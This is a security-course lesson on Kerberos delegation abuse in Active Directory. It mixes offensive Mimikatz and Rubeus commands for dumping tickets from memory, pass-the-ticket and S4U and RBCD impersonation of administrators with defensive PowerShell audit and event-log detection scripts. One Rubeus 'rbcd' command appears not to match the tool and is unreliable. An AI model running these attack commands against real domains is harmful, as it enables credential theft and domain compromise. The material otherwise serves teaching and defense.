Lesson 4: Delegation Abuse & Advanced Attacks
Advanced Kerberos delegation exploitation and comprehensive defense strategies
Learning Objectives
By the end of this lesson, you will be able to:
- Understand Kerberos delegation types and security implications
- Master unconstrained delegation exploitation techniques
- Execute constrained delegation and resource-based constrained delegation attacks
- Implement S4U2Self and S4U2Proxy attack methodologies
- Analyze delegation vulnerabilities and attack paths
- Deploy comprehensive delegation security controls
Kerberos Delegation Fundamentals
What is Kerberos Delegation?
Kerberos Delegation allows a service to act on behalf of a user when accessing other services. This is essential for multi-tier applications where a web service needs to access a database on behalf of the user.
Delegation Key Concepts:
- Impersonation: Service acts as the user
- Forwardable Tickets: Tickets that can be delegated
- Service-to-Service Authentication: Services authenticate to other services
- User Context Preservation: Maintains user identity through service chain
Delegation Types
Unconstrained Delegation
Service can delegate to any service in the domain
Characteristics:
- Complete delegation freedom
- Can access any service
- High security risk
- Legacy configuration
Security Impact:
- Complete domain compromise potential
- Lateral movement opportunities
- Privilege escalation vectors
Constrained Delegation
Service can only delegate to specific services
Characteristics:
- Limited delegation scope
- Specific service targets
- Protocol transition support
- More secure than unconstrained
Security Impact:
- Limited attack surface
- Targeted service access
- S4U attack vectors
Resource-Based Constrained Delegation
Target service controls which services can delegate to it
Characteristics:
- Resource-controlled delegation
- Enhanced security model
- PrincipalsAllowedToDelegateToSelf
- Modern configuration approach
Security Impact:
- Reduced attack surface
- Target service control
- Limited exploitation opportunities
Unconstrained Delegation Abuse
Unconstrained Delegation Attack Process
Target Identification
Identify services with unconstrained delegation
Enumeration Methods:
- PowerShell Active Directory queries
- BloodHound analysis
- LDAP attribute examination
- Automated enumeration tools
Ticket Collection
Collect TGTs from users accessing the service
Collection Methods:
- Monitor memory for cached tickets
- Use Mimikatz to extract tickets
- Wait for high-privilege users
- Social engineering techniques
Ticket Usage
Use collected TGTs for domain access
Usage Capabilities:
- Access any service in domain
- Impersonate the user
- Perform lateral movement
- Escalate privileges
Unconstrained Delegation Implementation
Using Mimikatz
Traditional unconstrained delegation exploitation
Command Syntax:
# Acquire debug privilege, then export every cached ticket
privilege::debug
sekurlsa::tickets /export
# Extract TGTs from memory
sekurlsa::tickets /export /luid:0x123456
# Use extracted TGT
kerberos::ptt ticket.kirbi
# Access domain resources
ls \\dc01.domain.com\c$
Using Rubeus
Modern C# implementation
Command Syntax:
# Monitor for TGTs
Rubeus.exe monitor /interval:5
# Extract TGTs
Rubeus.exe dump /luid:0x123456
# Use TGT for access
Rubeus.exe ptt /ticket:tgt.kirbi
# List the tickets now loaded in the session
Rubeus.exe klist
Constrained Delegation Abuse
S4U Attack Techniques
Service for User (S4U) extensions allow services to obtain tickets on behalf of users. This includes S4U2Self (impersonate user to self) and S4U2Proxy (impersonate user to another service).
S4U2Self Attack
Service impersonates user to itself
Attack Process:
- Compromise service with constrained delegation
- Use S4U2Self to impersonate user
- Obtain forwardable ticket
- Use ticket for service access
Implementation:
# S4U2Self attack
Rubeus.exe s4u /user:service_account /rc4:service_hash /impersonateuser:target_user /msdsspn:cifs/target_server.domain.com
# Use the ticket
Rubeus.exe ptt /ticket:ticket.kirbi
S4U2Proxy Attack
Service impersonates user to another service
Attack Process:
- Compromise service with constrained delegation
- Use S4U2Self to get forwardable ticket
- Use S4U2Proxy to access target service
- Impersonate user on target service
Implementation:
# S4U2Proxy attack
Rubeus.exe s4u /user:service_account /rc4:service_hash /impersonateuser:target_user /msdsspn:cifs/target_server.domain.com /altservice:ldap
# Access target service
Rubeus.exe ptt /ticket:proxy_ticket.kirbi
Constrained Delegation Enumeration
PowerShell Enumeration
Native PowerShell queries for constrained delegation
Command Syntax:
# Find computers with constrained delegation (msDS-AllowedToDelegateTo populated);
# TrustedToAuthForDelegation = $true means protocol transition is also enabled
Get-ADComputer -LDAPFilter "(msDS-AllowedToDelegateTo=*)" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo, ServicePrincipalName
# Find users with constrained delegation
Get-ADUser -LDAPFilter "(msDS-AllowedToDelegateTo=*)" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo, ServicePrincipalName
# Check specific delegation settings
Get-ADComputer -Identity "server01" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo
BloodHound Analysis
Graph-based analysis of delegation relationships
BloodHound Queries:
# Find unconstrained delegation
MATCH (c:Computer) WHERE c.unconstraineddelegation = true RETURN c
# Find constrained delegation (BloodHound models msDS-AllowedToDelegateTo as AllowedToDelegate edges from any principal)
MATCH (n)-[r:AllowedToDelegate]->(t:Computer) RETURN n, r, t
# Find computer-to-computer delegation paths
MATCH (c1:Computer)-[r:AllowedToDelegate]->(c2:Computer) RETURN c1, r, c2
Resource-Based Constrained Delegation Abuse
RBCD Attack Methodology
Resource-Based Constrained Delegation (RBCD) allows the target service to control which services can delegate to it. This can be abused by adding a compromised service account to the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (exposed in PowerShell as PrincipalsAllowedToDelegateToSelf), which only requires write access to that one object rather than domain-level delegation rights.
Target Identification
Identify services that can be targeted for RBCD abuse
Target Criteria:
- Services with SPNs
- Services with write permissions
- Services with GenericWrite/GenericAll
- Services with msDS-AllowedToActOnBehalfOfOtherIdentity
Service Account Creation
Create or compromise a service account for delegation
Account Requirements:
- Service account with SPN
- Password known to attacker
- Account with delegation capabilities
- Sufficient permissions for RBCD
RBCD Configuration
Configure RBCD on target service
Configuration Process:
- Set PrincipalsAllowedToDelegateToSelf
- Add service account to delegation list
- Configure delegation permissions
- Verify RBCD configuration
Delegation Abuse
Use RBCD for service impersonation
Abuse Capabilities:
- Impersonate any user
- Access target service
- Perform lateral movement
- Escalate privileges
RBCD Implementation
Using Rubeus
Modern RBCD attack implementation
Command Syntax:
# Configure RBCD
Rubeus.exe rbcd /user:target_service /rc4:target_hash /delegatefrom:compromised_service
# Perform S4U attack
Rubeus.exe s4u /user:compromised_service /rc4:compromised_hash /impersonateuser:admin /msdsspn:cifs/target_service.domain.com
# Use the ticket
Rubeus.exe ptt /ticket:ticket.kirbi
Using PowerShell
Native PowerShell RBCD implementation
Command Syntax:
# Configure RBCD
$target = Get-ADComputer -Identity "target_service"
$delegate = Get-ADComputer -Identity "compromised_service"
$target | Set-ADComputer -PrincipalsAllowedToDelegateToSelf $delegate
# Verify RBCD configuration
Get-ADComputer -Identity "target_service" -Properties PrincipalsAllowedToDelegateToSelf
Comprehensive Defense Strategies
Delegation Security Controls
Delegation Hardening
Implementation:
- Eliminate unconstrained delegation
- Use constrained delegation only when necessary
- Implement resource-based constrained delegation
- Regular delegation audits
- Principle of least privilege
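An audit that puts the first four controls above into practice, added here as an example and not part of the course material. It assumes the RSAT ActiveDirectory module and a read-only domain account; the userAccountControl bits, the LDAP bitwise matching rule OID and the primaryGroupID values are the documented AD constants, and the object returned for msDS-AllowedToActOnBehalfOfOtherIdentity is assumed to be the ActiveDirectorySecurity the module normally produces.

```powershell
# Added example (not from the course): inventory every delegation setting in the
# domain and flag the risky ones. Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# Documented userAccountControl bits
$UAC_TRUSTED_FOR_DELEGATION    = 0x80000    # unconstrained delegation
$UAC_TRUSTED_TO_AUTH_FOR_DELEG = 0x1000000  # constrained delegation with protocol transition

# One query for every object with any delegation setting. The OID is the LDAP
# bitwise-AND matching rule, so the UAC bits are tested server-side.
$ldap = "(|(userAccountControl:1.2.840.113556.1.4.803:=$UAC_TRUSTED_FOR_DELEGATION)" +
        "(userAccountControl:1.2.840.113556.1.4.803:=$UAC_TRUSTED_TO_AUTH_FOR_DELEG)" +
        "(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
$props = 'userAccountControl', 'msDS-AllowedToDelegateTo',
         'msDS-AllowedToActOnBehalfOfOtherIdentity', 'primaryGroupID'

$findings = foreach ($o in Get-ADObject -LDAPFilter $ldap -Properties $props) {
    $uac  = [int]$o.userAccountControl
    $isDC = $o.primaryGroupID -in 516, 521   # Domain Controllers / RODCs are unconstrained by design
    $rbcd = $o.'msDS-AllowedToActOnBehalfOfOtherIdentity'   # ActiveDirectorySecurity or $null (assumed)

    if ($uac -band $UAC_TRUSTED_FOR_DELEGATION) {
        $kind = 'Unconstrained'; $risk = if ($isDC) { 'Expected (DC)' } else { 'High' }
    } elseif ($uac -band $UAC_TRUSTED_TO_AUTH_FOR_DELEG) {
        $kind = 'Constrained + protocol transition'; $risk = 'High'   # S4U2Self needs no user ticket
    } elseif ($o.'msDS-AllowedToDelegateTo') {
        $kind = 'Constrained (Kerberos only)'; $risk = 'Medium'
    } else {
        $kind = 'RBCD target'; $risk = 'Medium'
    }
    [pscustomobject]@{
        Name        = $o.Name
        Class       = $o.ObjectClass
        Kind        = $kind
        Risk        = $risk
        AllowedTo   = ($o.'msDS-AllowedToDelegateTo' -join '; ')
        AllowedFrom = $(if ($rbcd) { ($rbcd.Access.IdentityReference.Value | Sort-Object -Unique) -join '; ' })
    }
}

# Privileged users an unconstrained host could still collect a TGT from: neither marked
# "sensitive and cannot be delegated" (AccountNotDelegated) nor in Protected Users.
$protectedUsers = (Get-ADGroup 'Protected Users').DistinguishedName
$exposedAdmins = Get-ADGroupMember 'Domain Admins' -Recursive |
    Where-Object objectClass -eq 'user' |
    Get-ADUser -Properties AccountNotDelegated, MemberOf |
    Where-Object { -not $_.AccountNotDelegated -and $_.MemberOf -notcontains $protectedUsers } |
    Select-Object SamAccountName

$findings | Sort-Object Risk, Kind | Format-Table -AutoSize
$exposedAdmins | Format-Table -AutoSize
```

Anything reported as High outside the DCs is a candidate for conversion to Kerberos-only constrained delegation or RBCD, and every admin in the second table should get AccountNotDelegated or Protected Users membership.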
Monitoring & Detection
Implementation:
- Monitor delegation configuration changes
- Alert on S4U attacks
- Track unusual delegation usage
- Implement behavioral analysis
- Use SIEM integration
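The three signals the list above asks for, pulled from a domain controller's Security log; this is an added example, not course material. It assumes the "Audit Kerberos Service Ticket Operations" and "Audit Directory Service Changes" subcategories are enabled, that computer objects carry a SACL for writes to msDS-AllowedToActOnBehalfOfOtherIdentity (otherwise no 5136 is produced), and that the EventData names used are the documented ones; the rendered-message text matched in step 3 is an assumption about the English event template.

```powershell
# Added example (not from the course): delegation-related detections over the Security log.
function Get-EventData {
    # Flatten the EventData section of a record into Name -> value properties.
    param([Parameter(ValueFromPipeline)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    process {
        $h = @{ Message = $Event.Message; Time = $Event.TimeCreated }
        foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
        [pscustomobject]$h
    }
}
$since = (Get-Date).AddHours(-24)

# 1) S4U2Proxy in use: a 4769 whose TransmittedServices ("Transited Services") names the
#    delegating principal. S4U2Self alone looks like an ordinary 4769 for the impersonated
#    user, so the proxy step is the one to baseline: any Service/ViaDelegate pair that is
#    not in the delegation inventory is suspect.
$s4uProxy = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769; StartTime=$since} -ErrorAction SilentlyContinue |
    Get-EventData |
    Where-Object { $_.TransmittedServices -and $_.TransmittedServices -ne '-' } |
    Select-Object Time, @{n='Impersonated';e={$_.TargetUserName}}, @{n='Service';e={$_.ServiceName}},
                  @{n='ViaDelegate';e={$_.TransmittedServices}}, @{n='Client';e={$_.IpAddress}}

# 2) RBCD written: 5136 on the attribute, with the writer and the target object.
$rbcdWrites = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5136; StartTime=$since} -ErrorAction SilentlyContinue |
    Get-EventData |
    Where-Object { $_.AttributeLDAPDisplayName -eq 'msDS-AllowedToActOnBehalfOfOtherIdentity' } |
    Select-Object Time, @{n='Target';e={$_.ObjectDN}}, @{n='ChangedBy';e={$_.SubjectUserName}}

# 3) Classic delegation flags: 4742 (computer) / 4738 (user) carry AllowedToDelegateTo and,
#    in the rendered message, the "'Trusted For Delegation' - Enabled" UAC change lines.
$flagChanges = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4742,4738; StartTime=$since} -ErrorAction SilentlyContinue |
    Get-EventData |
    Where-Object { $_.AllowedToDelegateTo -ne '-' -or
                   $_.Message -match "Trusted (For|To Authenticate For) Delegation' - Enabled" } |
    Select-Object Time, @{n='Account';e={$_.TargetUserName}}, @{n='ChangedBy';e={$_.SubjectUserName}},
                  @{n='AllowedTo';e={$_.AllowedToDelegateTo}}

$s4uProxy    | Format-Table -AutoSize
$rbcdWrites  | Format-Table -AutoSize
$flagChanges | Format-Table -AutoSize
```

Replace the Format-Table calls with whatever ships the objects to the SIEM; the same logic applies unchanged to an exported .evtx via Get-WinEvent -Path.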
Configuration Management
Implementation:
- Document all delegation configurations
- Implement change management
- Regular security assessments
- Automated configuration validation
- Security baseline enforcement
Incident Response
Implementation:
- Develop delegation incident procedures
- Implement automated response
- Regular security training
- Forensic analysis capabilities
- Threat hunting programs
Hands-On Exercise
Exercise: Comprehensive Delegation Attack Simulation
Objective: Execute various delegation attacks in a controlled environment and implement comprehensive defense mechanisms.
Steps:
- Delegation Enumeration
Identify delegation configurations:
# Find unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
# Find constrained delegation with protocol transition
Get-ADComputer -Filter {TrustedToAuthForDelegation -eq $true} -Properties TrustedToAuthForDelegation
# Find RBCD configurations
Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToSelf | Where-Object {$_.PrincipalsAllowedToDelegateToSelf}
- Unconstrained Delegation Attack
Execute unconstrained delegation abuse:
# Monitor for TGTs
Rubeus.exe monitor /interval:5
# Extract TGTs when available
Rubeus.exe dump /luid:0x123456
# Use TGT for domain access
Rubeus.exe ptt /ticket:tgt.kirbi
- Constrained Delegation Attack
Execute S4U attacks:
# S4U2Self attack
Rubeus.exe s4u /user:service_account /rc4:service_hash /impersonateuser:admin /msdsspn:cifs/target_server.domain.com
# Use the ticket
Rubeus.exe ptt /ticket:ticket.kirbi
- RBCD Attack
Execute resource-based constrained delegation abuse:
# Configure RBCD
Rubeus.exe rbcd /user:target_service /rc4:target_hash /delegatefrom:compromised_service
# Perform S4U attack
Rubeus.exe s4u /user:compromised_service /rc4:compromised_hash /impersonateuser:admin /msdsspn:cifs/target_service.domain.com
- Detection Implementation
Implement detection mechanisms:
# Monitor S4U2Proxy usage: service ticket requests (4769) whose "Transited Services" field is populated
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -notmatch "Transited Services:\s+-"}
# Check for delegation attribute changes (msDS-AllowedToDelegateTo / msDS-AllowedToActOnBehalfOfOtherIdentity)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5136} | Where-Object {$_.Message -like "*msDS-AllowedTo*"}
Deliverables:
- Delegation enumeration report
- Unconstrained delegation attack demonstration
- Constrained delegation attack demonstration
- RBCD attack demonstration
- Detection mechanism implementation
- Security recommendations report